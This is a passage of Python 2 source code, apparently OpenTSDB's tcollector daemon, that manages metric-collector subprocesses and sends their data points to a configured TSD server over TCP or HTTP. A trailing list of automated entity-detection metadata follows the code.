col.lines_received)) + strs.append(('collector.lines_invalid', 'collector=' + + col.name, col.lines_invalid)) + + ts = int(time.time()) + strout = [""tcollector.%s %d %d %s"" + % (x[0], ts, x[2], x[1]) for x in strs] + for string in strout: + self.sendq.append(string) + + break # TSD is alive. + + # if we get here, we assume the connection is good + self.last_verify = time.time() + return True + + def maintain_conn(self): + """"""Safely connect to the TSD and ensure that it's up and + running and that we're not talking to a ghost connection + (no response)."""""" + + # dry runs and http are always good + if self.dryrun or self.http: + return + + # connection didn't verify, so create a new one. we might be in + # this method for a long time while we sort this out. + try_delay = 1 + while ALIVE: + if self.verify_conn(): + return + + # increase the try delay by some amount and some random value, + # in case the TSD is down for a while. delay at most + # approximately 10 minutes. + try_delay *= 1 + random.random() + if try_delay > 600: + try_delay *= 0.5 + LOG.debug('SenderThread blocking %0.2f seconds', try_delay) + time.sleep(try_delay) + + # Now actually try the connection. + self.pick_connection() + try: + addresses = socket.getaddrinfo(self.host, self.port, + socket.AF_UNSPEC, + socket.SOCK_STREAM, 0) + except socket.gaierror, e: + # Don't croak on transient DNS resolution issues. + if e[0] in (socket.EAI_AGAIN, socket.EAI_NONAME, + socket.EAI_NODATA): + LOG.debug('DNS resolution failure: %s: %s', self.host, e) + continue + raise + for family, socktype, proto, canonname, sockaddr in addresses: + try: + self.tsd = socket.socket(family, socktype, proto) + self.tsd.settimeout(15) + self.tsd.connect(sockaddr) + # if we get here it connected + LOG.debug('Connection to %s was successful'%(str(sockaddr))) + break + except socket.error, msg: + LOG.warning('Connection attempt failed to %s:%d: %s', + self.host, self.port, msg) + self.tsd.close() + self.tsd = None + if not self.tsd: + LOG.error('Failed to connect to %s:%d', self.host, self.port) + self.blacklist_connection() + + def add_tags_to_line(self, line): + for tag, value in self.tags: + if ' %s=' % tag not in line: + line += ' %s=%s' % (tag, value) + return line + + def send_data(self): + """"""Sends outstanding data in self.sendq to the TSD in one operation."""""" + if self.http: + return self.send_data_via_http() + + # construct the output string + out = '' + + # in case of logging we use less efficient variant + if LOG.level == logging.DEBUG: + for line in self.sendq: + line = ""put %s"" % self.add_tags_to_line(line) + out += line + ""\n"" + LOG.debug('SENDING: %s', line) + else: + out = """".join(""put %s\n"" % self.add_tags_to_line(line) for line in self.sendq) + + if not out: + LOG.debug('send_data no data?') + return + + # try sending our data. if an exception occurs, just error and + # try sending again next time. + try: + if self.dryrun: + print out + else: + self.tsd.sendall(out) + self.sendq = [] + except socket.error, msg: + LOG.error('failed to send data: %s', msg) + try: + self.tsd.close() + except socket.error: + pass + self.tsd = None + self.blacklist_connection() + + # FIXME: we should be reading the result at some point to drain + # the packets out of the kernel's queue + + def send_data_via_http(self): + """"""Sends outstanding data in self.sendq to TSD in one HTTP API call."""""" + metrics = [] + for line in self.sendq: + # print "" %s"" % line + parts = line.split(None, 3) + # not all metrics have metric-specific tags + if len(parts) == 4: + (metric, timestamp, value, raw_tags) = parts + else: + (metric, timestamp, value) = parts + raw_tags = """" + # process the tags + metric_tags = {} + for tag in raw_tags.strip().split(): + (tag_key, tag_value) = tag.split(""="", 1) + metric_tags[tag_key] = tag_value + metric_entry = {} + metric_entry[""metric""] = metric + metric_entry[""timestamp""] = long(timestamp) + metric_entry[""value""] = float(value) + metric_entry[""tags""] = dict(self.tags).copy() + if len(metric_tags) + len(metric_entry[""tags""]) > self.maxtags: + metric_tags_orig = set(metric_tags) + subset_metric_keys = frozenset(metric_tags[:len(metric_tags[:self.maxtags-len(metric_entry[""tags""])])]) + metric_tags = dict((k, v) for k, v in metric_tags.iteritems() if k in subset_metric_keys) + LOG.error(""Exceeding maximum permitted metric tags - removing %s for metric %s"", + str(metric_tags_orig - set(metric_tags)), metric) + metric_entry[""tags""].update(metric_tags) + metrics.append(metric_entry) + + if self.dryrun: + print ""Would have sent:\n%s"" % json.dumps(metrics, + sort_keys=True, + indent=4) + return + + self.pick_connection() + # print ""Using server: %s:%s"" % (self.host, self.port) + # url = ""http://%s:%s/api/put?details"" % (self.host, self.port) + # print ""Url is %s"" % url + LOG.debug(""Sending metrics to http://%s:%s/api/put?details"", + self.host, self.port) + if self.ssl: + protocol = ""https"" + else: + protocol = ""http"" + req = urllib2.Request(""%s://%s:%s/api/put?details"" % ( + protocol, self.host, self.port)) + if self.http_username and self.http_password: + req.add_header(""Authorization"", ""Basic %s"" + % base64.b64encode(""%s:%s"" % (self.http_username, self.http_password))) + req.add_header(""Content-Type"", ""application/json"") + try: + response = urllib2.urlopen(req, json.dumps(metrics)) + LOG.debug(""Received response %s"", response.getcode()) + # clear out the sendq + self.sendq = [] + # print ""Got response code: %s"" % response.getcode() + # print ""Content:"" + # for line in response: + # print line, + # print + except urllib2.HTTPError, e: + LOG.error(""Got error %s"", e) + # for line in http_error: + # print line, + + +def setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None): + """"""Sets up logging and associated handlers."""""" + + LOG.setLevel(logging.INFO) + if backup_count is not None and max_bytes is not None: + assert backup_count > 0 + assert max_bytes > 0 + ch = RotatingFileHandler(logfile, 'a', max_bytes, backup_count) + else: # Setup stream handler. + ch = logging.StreamHandler(sys.stdout) + + ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] ' + '%(levelname)s: %(message)s')) + LOG.addHandler(ch) + + +def parse_cmdline(argv): + """"""Parses the command-line."""""" + + # get arguments + default_cdir = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), + 'collectors') + parser = OptionParser(description='Manages collectors which gather ' + 'data and report back.') + parser.add_option('-c', '--collector-dir', dest='cdir', metavar='DIR', + default=default_cdir, + help='Directory where the collectors are located.') + parser.add_option('-d', '--dry-run', dest='dryrun', action='store_true', + default=False, + help='Don\'t actually send anything to the TSD, ' + 'just print the datapoints.') + parser.add_option('-D', '--daemonize', dest='daemonize', action='store_true', + default=False, help='Run as a background daemon.') + parser.add_option('-H', '--host', dest='host', default='localhost', + metavar='HOST', + help='Hostname to use to connect to the TSD.') + parser.add_option('-L', '--hosts-list', dest='hosts', default=False, + metavar='HOSTS', + help='List of host:port to connect to tsd\'s (comma separated).') + parser.add_option('--no-tcollector-stats', dest='no_tcollector_stats', + default=False, action='store_true', + help='Prevent tcollector from reporting its own stats to TSD') + parser.add_option('-s', '--stdin', dest='stdin', action='store_true', + default=False, + help='Run once, read and dedup data points from stdin.') + parser.add_option('-p', '--port', dest='port', type='int', + default=DEFAULT_PORT, metavar='PORT', + help='Port to connect to the TSD instance on. ' + 'default=%default') + parser.add_option('-v', dest='verbose', action='store_true', default=False, + help='Verbose mode (log debug messages).') + parser.add_option('-t', '--tag', dest='tags', action='append', + default=[], metavar='TAG', + help='Tags to append to all timeseries we send, ' + 'e.g.: -t TAG=VALUE -t TAG2=VALUE') + parser.add_option('-P', '--pidfile', dest='pidfile', + default='/var/run/tcollector.pid', + metavar='FILE', help='Write our pidfile') + parser.add_option('--dedup-interval', dest='dedupinterval', type='int', + default=300, metavar='DEDUPINTERVAL', + help='Number of seconds in which successive duplicate ' + 'datapoints are suppressed before sending to the TSD. ' + 'Use zero to disable. ' + 'default=%default') + parser.add_option('--evict-interval', dest='evictinterval', type='int', + default=6000, metavar='EVICTINTERVAL', + help='Number of seconds after which to remove cached ' + 'values of old data points to save memory. ' + 'default=%default') + parser.add_option('--allowed-inactivity-time', dest='allowed_inactivity_time', type='int', + default=ALLOWED_INACTIVITY_TIME, metavar='ALLOWEDINACTIVITYTIME', + help='How long to wait for datapoints before assuming ' + 'a collector is dead and restart it. ' + 'default=%default') + parser.add_option('--remove-inactive-collectors', dest='remove_inactive_collectors', action='store_true', + default=False, help='Remove collectors not sending data ' + 'in the max allowed inactivity interval') + parser.add_option('--max-bytes', dest='max_bytes', type='int', + default=64 * 1024 * 1024, + help='Maximum bytes per a logfile.') + parser.add_option('--backup-count', dest='backup_count', type='int', + default=0, help='Maximum number of logfiles to backup.') + parser.add_option('--logfile', dest='logfile', type='str', + default=DEFAULT_LOG, + help='Filename where logs are written to.') + parser.add_option('--reconnect-interval',dest='reconnectinterval', type='int', + default=0, metavar='RECONNECTINTERVAL', + help='Number of seconds after which the connection to' + 'the TSD hostname reconnects itself. This is useful' + 'when the hostname is a multiple A record (RRDNS).' + ) + parser.add_option('--max-tags', dest='maxtags', type=int, default=8, + help='The maximum number of tags to send to our TSD Instances') + parser.add_option('--http', dest='http', action='store_true', default=False, + help='Send the data via the http interface') + parser.add_option('--http-username', dest='http_username', default=False, + help='Username to use for HTTP Basic Auth when sending the data via HTTP') + parser.add_option('--http-password', dest='http_password', default=False, + help='Password to use for HTTP Basic Auth when sending the data via HTTP') + parser.add_option('--ssl', dest='ssl', action='store_true', default=False, + help='Enable SSL - used in conjunction with http') + (options, args) = parser.parse_args(args=argv[1:]) + if options.dedupinterval < 0: + parser.error('--dedup-interval must be at least 0 seconds') + if options.evictinterval <= options.dedupinterval: + parser.error('--evict-interval must be strictly greater than ' + '--dedup-interval') + if options.reconnectinterval < 0: + parser.error('--reconnect-interval must be at least 0 seconds') + # We cannot write to stdout when we're a daemon. + if (options.daemonize or options.max_bytes) and not options.backup_count: + options.backup_count = 1 + return (options, args) + + +def daemonize(): + """"""Performs the necessary dance to become a background daemon."""""" + if os.fork(): + os._exit(0) + os.chdir(""/"") + os.umask(022) + os.setsid() + os.umask(0) + if os.fork(): + os._exit(0) + stdin = open(os.devnull) + stdout = open(os.devnull, 'w') + os.dup2(stdin.fileno(), 0) + os.dup2(stdout.fileno(), 1) + os.dup2(stdout.fileno(), 2) + stdin.close() + stdout.close() + os.umask(022) + for fd in xrange(3, 1024): + try: + os.close(fd) + except OSError: # This FD wasn't opened... + pass # ... ignore the exception. + + +def setup_python_path(collector_dir): + """"""Sets up PYTHONPATH so that collectors can easily import common code."""""" + mydir = os.path.dirname(collector_dir) + libdir = os.path.join(mydir, 'collectors', 'lib') + if not os.path.isdir(libdir): + return + pythonpath = os.environ.get('PYTHONPATH', '') + if pythonpath: + pythonpath += ':' + pythonpath += mydir + os.environ['PYTHONPATH'] = pythonpath + LOG.debug('Set PYTHONPATH to %r', pythonpath) + + +def main(argv): + """"""The main tcollector entry point and loop."""""" + + options, args = parse_cmdline(argv) + if options.daemonize: + daemonize() + setup_logging(options.logfile, options.max_bytes or None, + options.backup_count or None) + + if options.verbose: + LOG.setLevel(logging.DEBUG) # up our level + + if options.pidfile: + write_pid(options.pidfile) + + # validate everything + tags = {} + for tag in options.tags: + if re.match('^[-_.a-z0-9]+=\S+$', tag, re.IGNORECASE) is None: + assert False, 'Tag string ""%s"" is invalid.' % tag + k, v = tag.split('=', 1) + if k in tags: + assert False, 'Tag ""%s"" already declared.' % k + tags[k] = v + + if not 'host' in tags and not options.stdin: + tags['host'] = socket.gethostname() + LOG.warning('Tag ""host"" not specified, defaulting to %s.', tags['host']) + + options.cdir = os.path.realpath(options.cdir) + if not os.path.isdir(options.cdir): + LOG.fatal('No such directory: %s', options.cdir) + return 1 + modules = load_etc_dir(options, tags) + + setup_python_path(options.cdir) + + # gracefully handle death for normal termination paths and abnormal + atexit.register(shutdown) + for sig in (signal.SIGTERM, signal.SIGINT): + signal.signal(sig, shutdown_signal) + + # at this point we're ready to start processing, so start the ReaderThread + # so we can have it running and pulling in data for us + reader = ReaderThread(options.dedupinterval, options.evictinterval) + reader.start() + + # prepare list of (host, port) of TSDs given on CLI + if not options.hosts: + options.hosts = [(options.host, options.port)] + else: + def splitHost(hostport): + if "":"" in hostport: + # Check if we have an IPv6 address. + if hostport[0] == ""["" and ""]:"" in hostport: + host, port = hostport.split(""]:"") + host = host[1:] + else: + host, port = hostport.split("":"") + return (host, int(port)) + return (hostport, DEFAULT_PORT) + options.hosts = [splitHost(host) for host in options.hosts.split("","")] + if options.host != ""localhost"" or options.port != DEFAULT_PORT: + options.hosts.append((options.host, options.port)) + + # and setup the sender to start writing out to the tsd + sender = SenderThread(reader, options.dryrun, options.hosts, + not options.no_tcollector_stats, tags, options.reconnectinterval, + options.http, options.http_username, + options.http_password, options.ssl, options.maxtags) + sender.start() + LOG.info('SenderThread startup complete') + + # if we're in stdin mode, build a stdin collector and just join on the + # reader thread since there's nothing else for us to do here + if options.stdin: + register_collector(StdinCollector()) + stdin_loop(options, modules, sender, tags) + else: + sys.stdin.close() + main_loop(options, modules, sender, tags) + + # We're exiting, make sure we don't leave any collector behind. + for col in all_living_collectors(): + col.shutdown() + LOG.debug('Shutting down -- joining the reader thread.') + reader.join() + LOG.debug('Shutting down -- joining the sender thread.') + sender.join() + +def stdin_loop(options, modules, sender, tags): + """"""The main loop of the program that runs when we are in stdin mode."""""" + + global ALIVE + next_heartbeat = int(time.time() + 600) + while ALIVE: + time.sleep(15) + reload_changed_config_modules(modules, options, sender, tags) + now = int(time.time()) + if now >= next_heartbeat: + LOG.info('Heartbeat (%d collectors running)' + % sum(1 for col in all_living_collectors())) + next_heartbeat = now + 600 + +def main_loop(options, modules, sender, tags): + """"""The main loop of the program that runs when we're not in stdin mode."""""" + + next_heartbeat = int(time.time() + 600) + while ALIVE: + populate_collectors(options.cdir) + reload_changed_config_modules(modules, options, sender, tags) + reap_children() + check_children(options) + spawn_children() + time.sleep(15) + now = int(time.time()) + if now >= next_heartbeat: + LOG.info('Heartbeat (%d collectors running)' + % sum(1 for col in all_living_collectors())) + next_heartbeat = now + 600 + + +def list_config_modules(etcdir): + """"""Returns an iterator that yields the name of all the config modules."""""" + if not os.path.isdir(etcdir): + return iter(()) # Empty iterator. + return (name for name in os.listdir(etcdir) + if (name.endswith('.py') + and os.path.isfile(os.path.join(etcdir, name)))) + + +def load_etc_dir(options, tags): + """"""Loads any Python module from tcollector's own 'etc' directory. + + Returns: A dict of path -> (module, timestamp). + """""" + + etcdir = os.path.join(options.cdir, 'etc') + sys.path.append(etcdir) # So we can import modules from the etc dir. + modules = {} # path -> (module, timestamp) + for name in list_config_modules(etcdir): + path = os.path.join(etcdir, name) + module = load_config_module(name, options, tags) + modules[path] = (module, os.path.getmtime(path)) + return modules + + +def load_config_module(name, options, tags): + """"""Imports the config module of the given name + + The 'name' argument can be a string, in which case the module will be + loaded by name, or it can be a module object, in which case the module + will get reloaded. + + If the module has an 'onload' function, calls it. + Returns: the reference to the module loaded. + """""" + + if isinstance(name, str): + LOG.info('Loading %s', name) + d = {} + # Strip the trailing .py + module = __import__(name[:-3], d, d) + else: + module = reload(name) + onload = module.__dict__.get('onload') + if callable(onload): + try: + onload(options, tags) + except: + LOG.fatal('Exception while loading %s', name) + raise + return module + + +def reload_changed_config_modules(modules, options, sender, tags): + """"""Reloads any changed modules from the 'etc' directory. + + Args: + cdir: The path to the 'collectors' directory. + modules: A dict of path -> (module, timestamp). + Returns: whether or not anything has changed. + """""" + + etcdir = os.path.join(options.cdir, 'etc') + current_modules = set(list_config_modules(etcdir)) + current_paths = set(os.path.join(etcdir, name) + for name in current_modules) + changed = False + + # Reload any module that has changed. + for path, (module, timestamp) in modules.iteritems(): + if path not in current_paths: # Module was removed. + continue + mtime = os.path.getmtime(path) + if mtime > timestamp: + LOG.info('Reloading %s, file has changed', path) + module = load_config_module(module, options, tags) + modules[path] = (module, mtime) + changed = True + + # Remove any module that has been removed. + for path in set(modules).difference(current_paths): + LOG.info('%s has been removed, tcollector should be restarted', path) + del modules[path] + changed = True + + # Check for any modules that may have been added. + for name in current_modules: + path = os.path.join(etcdir, name) + if path not in modules: + module = load_config_module(name, options, tags) + modules[path] = (module, os.path.getmtime(path)) + changed = True + + return changed + + +def write_pid(pidfile): + """"""Write our pid to a pidfile."""""" + f = open(pidfile, ""w"") + try: + f.write(str(os.getpid())) + finally: + f.close() + + +def all_collectors(): + """"""Generator to return all collectors."""""" + + return COLLECTORS.itervalues() + + +# collectors that are not marked dead +def all_valid_collectors(): + """"""Generator to return all defined collectors that haven't been marked + dead in the past hour, allowing temporarily broken collectors a + chance at redemption."""""" + + now = int(time.time()) + for col in all_collectors(): + if not col.dead or (now - col.lastspawn > 3600): + yield col + + +# collectors that have a process attached (currenty alive) +def all_living_collectors(): + """"""Generator to return all defined collectors that have + an active process."""""" + + for col in all_collectors(): + if col.proc is not None: + yield col + + +def shutdown_signal(signum, frame): + """"""Called when we get a signal and need to terminate."""""" + LOG.warning(""shutting down, got signal %d"", signum) + shutdown() + + +def kill(proc, signum=signal.SIGTERM): + os.killpg(proc.pid, signum) + + +def shutdown(): + """"""Called by atexit and when we receive a signal, this ensures we properly + terminate any outstanding children."""""" + + global ALIVE + # prevent repeated calls + if not ALIVE: + return + # notify threads of program termination + ALIVE = False + + LOG.info('shutting down children') + + # tell everyone to die + for col in all_living_collectors(): + col.shutdown() + + LOG.info('exiting') + sys.exit(1) + + +def reap_children(): + """"""When a child process dies, we have to determine why it died and whether + or not we need to restart it. This method manages that logic."""""" + + for col in all_living_collectors(): + now = int(time.time()) + # FIXME: this is not robust. the asyncproc module joins on the + # reader threads when you wait if that process has died. this can cause + # slow dying processes to hold up the main loop. good for now though. + status = col.proc.poll() + if status is None: + continue + col.proc = None + + # behavior based on status. a code 0 is normal termination, code 13 + # is used to indicate that we don't want to restart this collector. + # any other status code is an error and is logged. + if status == 13: + LOG.info('removing %s from the list of collectors (by request)', + col.name) + col.dead = True + elif status != 0: + LOG.warning('collector %s terminated after %d seconds with ' + 'status code %d, marking dead', + col.name, now - col.lastspawn, status) + col.dead = True + else: + register_collector(Collector(col.name, col.interval, col.filename, + col.mtime, col.lastspawn)) + +def check_children(options): + """"""When a child process hasn't received a datapoint in a while, + assume it's died in some fashion and restart it."""""" + + for col in all_living_collectors(): + now = int(time.time()) + + if col.last_datapoint < (now - options.allowed_inactivity_time): + # It's too old, kill it + LOG.warning('Terminating collector %s after %d seconds of inactivity', + col.name, now - col.last_datapoint) + col.shutdown() + if not options.remove_inactive_collectors: + register_collector(Collector(col.name, col.interval, col.filename, + col.mtime, col.lastspawn)) + + +def set_nonblocking(fd): + """"""Sets the given file descriptor to non-blocking mode."""""" + fl = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK + fcntl.fcntl(fd, fcntl.F_SETFL, fl) + + +def spawn_collector(col): + """"""Takes a Collector object and creates a process for it."""""" + + LOG.info('%s (interval=%d) needs to be spawned', col.name, col.interval) + + # FIXME: do custom integration of Python scripts into memory/threads + # if re.search('\.py$', col.name) is not None: + # ... load the py module directly instead of using a subprocess ... + try: + col.proc = subprocess.Popen(col.filename, stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + close_fds=True, + preexec_fn=os.setsid) + except OSError, e: + LOG.error('Failed to spawn collector %s: %s' % (col.filename, e)) + return + # The following line needs to move below this line because it is used in + # other logic and it makes no sense to update the last spawn time if the + # collector didn't actually start. + col.lastspawn = int(time.time()) + set_nonblocking(col.proc.stdout.fileno()) + set_nonblocking(col.proc.stderr.fileno()) + if col.proc.pid > 0: + col.dead = False + LOG.info('spawned %s (pid=%d)', col.name, col.proc.pid) + return + # FIXME: handle errors better + LOG.error('failed to spawn collector: %s', col.filename) + + +def spawn_children(): + """"""Iterates over our defined collectors and performs the logic to + determine if we need to spawn, kill, or otherwise take some + action on them."""""" + + if not ALIVE: + return + + for col in all_valid_collectors(): + now = int(time.time()) + if col.interval == 0: + if col.proc is None: + spawn_collector(col) + elif col.interval <= now - col.lastspawn: + if col.proc is None: + spawn_collector(col) + continue + + # I'm not very satisfied with this path. It seems fragile and + # overly complex, maybe we should just reply on the asyncproc + # terminate method, but that would make the main tcollector + # block until it dies... :| + if col.nextkill > now: + continue + if col.killstate == 0: + LOG.warning('warning: %s (interval=%d, pid=%d) overstayed ' + 'its welcome, SIGTERM sent', + col.name, col.interval, col.proc.pid) + kill(col.proc) + col.nextkill = now + 5 + col.killstate = 1 + elif col.killstate == 1: + LOG.error('error: %s (interval=%d, pid=%d) still not dead, ' + 'SIGKILL sent', + col.name, col.interval, col.proc.pid) + kill(col.proc, signal.SIGKILL) + col.nextkill = now + 5 + col.killstate = 2 + else: + LOG.error('error: %s (interval=%d, pid=%d) needs manual ' + 'intervention to kill it', + col.name, col.interval, col.proc.pid) + col.nextkill = now + 300 + + +def populate_collectors(coldir): + """"""Maintains our internal list of valid collectors. This walks the + collector directory and looks for files. In subsequent calls, this + also looks for changes to the files -- new, removed, or updated files, + and takes the right action to bring the state of our running processes + in line with the filesystem."""""" + + global GENERATION + GENERATION += 1 + + # get numerics from scriptdir, we're only setup to handle numeric paths + # which define intervals for our monitoring scripts + for interval in os.listdir(coldir): + if not interval.isdigit(): + continue + interval = int(interval) + + for colname in os.listdir('%s/%d' % (coldir, interval)): + if colname.startswith('.'): + continue + + filename = '%s/%d/%s' % (coldir, interval, colname) + if os.path.isfile(filename) and os.access(filename, os.X_OK): + mtime = os.path.getmtime(filename) + + # if this collector is already 'known', then check if it's + # been updated (new mtime) so we can kill off the old one + # (but only if it's interval 0, else we'll just get + # it next time it runs) + if colname in COLLECTORS: + col = COLLECTORS[colname] + + # if we get a dupe, then ignore the one we're trying to + # add now. there is probably a more robust way of doing + # this... + if col.interval != interval: + LOG.error('two collectors with the same name %s and ' + 'different intervals %d and %d', + colname, interval, col.interval) + continue + + # we have to increase the generation or we will kill + # this script again + col.generation = GENERATION + if col.mtime < mtime: + LOG.info('%s has been updated on disk', col.name) + col.mtime = mtime + if not col.interval: + col.shutdown() + LOG.info('Respawning %s', col.name) + register_collector(Collector(colname, interval, + filename, mtime)) + else: + register_collector(Collector(colname, interval, filename, + mtime)) + + # now iterate over everybody and look for old generations + to_delete = [] + for col in all_collectors(): + if col.generation < GENERATION: + LOG.info('collector %s removed from the filesystem, forgetting', + col.name) + col.shutdown() + to_delete.append(col.name) + for name in to_delete: + del COLLECTORS[name] + + +if __name__ == '__main__': + sys.exit(main(sys.argv)) +",58560,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Mark Smith dummy@email.com'], ['DATE_TIME', 'September 2020'], ['PERSON', 'Args'], ['LOCATION', 'del self.values[key]'], ['LOCATION', 'self.datalines.append(line.rstrip'], ['PERSON', 'Args'], ['DATE_TIME', 'this many seconds'], ['PERSON', 'Parses'], ['DATE_TIME', 'every 10 minutes'], ['DATE_TIME', 'the beginning/end'], ['DATE_TIME', 'Fall'], ['PERSON', 'dryrun'], ['PERSON', 'Args'], ['PERSON', 'dryrun'], ['DATE_TIME', 'seconds'], ['PERSON', 'hostport'], ['LOCATION', 'self.host'], ['PERSON', ""LOG.info('Blacklisting""], ['LOCATION', 'self.host'], ['DATE_TIME', '5\n seconds'], ['DATE_TIME', '5 more seconds'], ['PERSON', 'self.maintain_conn'], ['PERSON', 'SenderThread'], ['PERSON', 'SenderThread'], ['DATE_TIME', 'less than a minute ago'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['PERSON', 'LOG.debug(""Sending'], ['URL', 'LOG.de'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['URL', 'LOG.de'], ['URL', 'urllib2.HT'], ['URL', 'LOG.er'], ['PERSON', 'LOG.addHandler(ch'], ['LOCATION', 'parse_cmdline(argv'], ['PERSON', 'Parses'], ['PERSON', ""metavar='HOST""], ['PERSON', ""metavar='FILE""], ['DATE_TIME', 'seconds'], ['LOCATION', ""metavar='EVICTINTERVAL""], ['DATE_TIME', 'seconds'], ['LOCATION', ""dest='allowed_inactivity_time""], ['DATE_TIME', ""help='Remove""], ['PERSON', 'max'], ['PERSON', ""type='str""], ['DATE_TIME', 'seconds'], ['PERSON', ""help='The""], ['PERSON', ""dest='http_password""], ['DATE_TIME', ""at least 0 seconds'""], ['DATE_TIME', ""at least 0 seconds'""], ['PERSON', 'mydir = os.path.dirname(collector_dir'], ['PERSON', 'libdir = os.path.join(mydir'], ['PERSON', ""LOG.fatal('No""], ['PERSON', 'options.cdir'], ['LOCATION', 'options.http_username'], ['PERSON', 'all_living_collectors'], ['PERSON', 'time.sleep(15'], ['PERSON', 'all_living_collectors'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'Args'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'del modules[path'], ['DATE_TIME', 'the past hour'], ['PERSON', 'currenty'], ['DATE_TIME', 'seconds'], ['DATE_TIME', 'seconds'], ['LOCATION', 'fcntl'], ['LOCATION', 'fcntl'], ['LOCATION', ""os.listdir('%s/%d""], ['PERSON', 'X_OK'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['LOCATION', 'del COLLECTORS[name]'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'tcollector.py'], ['URL', 'email.com'], ['URL', 'logging.ge'], ['URL', 'collector.na'], ['URL', 'collector.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.sh'], ['URL', 'collector.na'], ['URL', 'LOG.er'], ['URL', 'self.na'], ['URL', 'self.int'], ['URL', 'self.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.ne'], ['URL', 'self.ki'], ['URL', 'self.de'], ['URL', 'self.mt'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.la'], ['URL', 'self.proc.stderr.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.na'], ['URL', 'self.proc.stdout.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.buffer.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'LOG.in'], ['URL', 'self.pro'], ['URL', 'self.na'], ['URL', 'time.sl'], ['URL', 'self.pro'], ['URL', 'signal.SI'], ['URL', 'self.pro'], ['URL', 'self.values.ke'], ['URL', 'self.va'], ['URL', 'self.va'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'sys.stdin.re'], ['URL', 'line.rs'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.de'], ['URL', 'LOG.de'], ['URL', 'col.co'], ['URL', 'self.pro'], ['URL', 'self.de'], ['URL', 'time.sl'], ['URL', 'self.li'], ['URL', 'col.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 're.ma'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'parsed.gr'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'col.va'], ['URL', 'self.li'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'tags.it'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'random.sh'], ['URL', 'self.cu'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'random.sh'], ['URL', 'hosts.cl'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'hosts.ad'], ['URL', 'self.ma'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.ht'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'socket.er'], ['URL', 'self.tsd.re'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'self.se'], ['URL', 'self.la'], ['URL', 'self.ht'], ['URL', 'self.ve'], ['URL', 'LOG.de'], ['URL', 'time.sl'], ['URL', 'socket.ge'], ['URL', 'socket.AF'], ['URL', 'socket.SO'], ['URL', 'socket.ga'], ['URL', 'LOG.de'], ['URL', 'socket.so'], ['URL', 'self.tsd.se'], ['URL', 'self.tsd.co'], ['URL', 'LOG.de'], ['URL', 'socket.er'], ['URL', 'self.tsd.cl'], ['URL', 'LOG.er'], ['URL', 'self.se'], ['URL', 'self.ht'], ['URL', 'self.se'], ['URL', 'logging.DE'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'LOG.de'], ['URL', 'self.ad'], ['URL', 'self.se'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'self.se'], 